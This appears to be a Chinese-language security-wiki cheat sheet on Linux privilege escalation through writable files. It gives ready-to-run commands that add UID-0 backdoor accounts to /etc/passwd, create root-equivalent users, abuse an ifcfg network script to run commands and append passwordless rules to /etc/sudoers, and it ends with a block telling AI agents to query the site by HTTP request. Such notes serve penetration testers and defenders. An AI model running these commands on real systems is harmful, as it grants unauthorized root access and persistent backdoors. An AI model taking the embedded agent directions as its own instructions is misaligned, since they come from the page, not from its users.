# 可写文件提权 **列出系统中可写文件** ``` >find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null >find / -perm -2 -type f 2>/dev/null >find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null ``` **passwd文件** ``` $ls –lh /etc/passwd 若是任何用户可读写 $perl -le 'print crypt("password@123","addedsalt")' 生成密码或php -r "print(crypt('aarti','123') . \"\n\");"或python -c 'import crypt; print crypt.crypt("pass", "$6$salt")' $echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd 一条命令添加root用户 >useradd -p `openssl passwd -1 -salt 'user' 123qwe` -u 0 -o -g root -G root -s /bin/bash -d /home/user venus 用户名venus 密码123qwe >useradd newuser;echo "newuser:password"|chpasswd >echo "admin:x:0:0::/:/bin/sh" >> /etc/passwd >passwd admin修改密码 或 >useradd newuser;echo "newuser:password"|chpasswd >useradd -p `openssl passwd 123456` guest >useradd -p "$(openssl passwd 123456)" guest >useradd newuwer;echo -e "123456\n123456\n" |passwd newuser ``` **/etc/sysconfig/network-scripts/** ``` NAME=Network /bin/id <= 注意空格 ONBOOT=yes DEVICE=eth0 EXEC : ./etc/sysconfig/network-scripts/ifcfg-1337 ``` **sudoers** ``` echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers 无需密码使用sudo echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.heresecurity.wiki/quan-xian-ti-sheng/linux-ti-quan/ke-xie-wen-jian-ti-quan.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.